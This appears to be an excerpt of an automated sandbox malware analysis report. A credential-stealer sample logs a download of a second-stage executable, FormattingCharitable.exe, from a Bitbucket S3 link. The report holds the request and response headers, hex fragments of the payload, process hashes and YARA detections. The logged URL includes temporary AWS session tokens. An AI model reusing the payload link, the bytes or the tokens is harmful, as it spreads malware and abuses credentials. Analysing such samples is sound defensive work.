                                                                                                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2 [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 23 Dec 2024 07:41:03 GMT
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                                                                                                        X-Served-By: 68ce1657753d
                                                                                                                                                                                                                                                                        X-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Static-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Request-Count: 1664
                                                                                                                                                                                                                                                                        X-Render-Time: 0.04715466499328613
                                                                                                                                                                                                                                                                        X-B3-Traceid: dbc8b4061a6147f6ae7d3d383d5e711d
                                                                                                                                                                                                                                                                        X-B3-Spanid: 5f1478fe78f17de0
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-e [TRUNCATED]
                                                                                                                                                                                                                                                                        X-Usage-Quota-Remaining: 999014.018
                                                                                                                                                                                                                                                                        X-Usage-Request-Cost: 999.53
                                                                                                                                                                                                                                                                        X-Usage-User-Time: 0.029618
                                                                                                                                                                                                                                                                        X-Usage-System-Time: 0.000368
                                                                                                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Atl-Traceid: dbc8b4061a6147f6ae7d3d383d5e711d
                                                                                                                                                                                                                                                                        Atl-Request-Id: dbc8b406-1a61-47f6-ae7d-3d383d5e711d
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                                                                                                        Server-Timing: atl-edge;dur=156,atl-edge-internal;dur=3,atl-edge-upstream;dur=154,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.11 | 49777 | 52.216.152.124 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:41:05 UTC | 1364 | OUT | GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy [TRUNCATED]
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
2024-12-23 07:41:06 UTC | 554 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        x-amz-id-2: BcyhFs/eZ8uzMGv6Ui5sRxLCg7kAi6z/sIzGxcF3GSwIww+fRnjSQDIqtmVMLFYp6ClCqxYOlhw=
                                                                                                                                                                                                                                                                        x-amz-request-id: QSTQ00AY5WD3X4G3
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:41:06 GMT
                                                                                                                                                                                                                                                                        Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                                                                                                                        ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                        x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                        Content-Length: 1325507
                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC9000INData Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
                                                                                                                                                                                                                                                                        Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC16384INData Raw: 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27 b6 02 4e 6c 48 6e 85 f6 a4 56 64 4b 74 e8 09 a8 2e a9 a1 f0
                                                                                                                                                                                                                                                                        Data Ascii: OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'NlHnVdKt.
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC1024INData Raw: 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b ba 88 eb 98 82 dc 1a 92 bf 4c 24 bf b5 86 f9 3b 3d 4f 02 f9
                                                                                                                                                                                                                                                                        Data Ascii: yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+L$;=O



                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:02:40:32
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\jSFUzuYPG9.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                                                                                                        File size:2'870'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:820F418E980B172684FE96E4AA6E50A5
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:02:41:08
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140
                                                                                                                                                                                                                                                                        Imagebase:0xdc0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, Offset: 016A9000, based on PE: false
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000003.1477517093.00000000016A9000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_16a9000_jSFUzuYPG9.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ccfc26d044cdaa8c38c3cbf5ceca6a61d6ba29d49bdaa5a8d6ead811ad6bcfc4
                                                                                                                                                                                                                                                                          • Instruction ID: 3fc51af0fb16535f555b6614f20dab9f24c933b0621c77baaf863d69a29ebb63
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccfc26d044cdaa8c38c3cbf5ceca6a61d6ba29d49bdaa5a8d6ead811ad6bcfc4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEB1EB6254E3C15FE30387344C6AA95BF75AF23614F4E86DBD1C08F4E3D28A494ACB62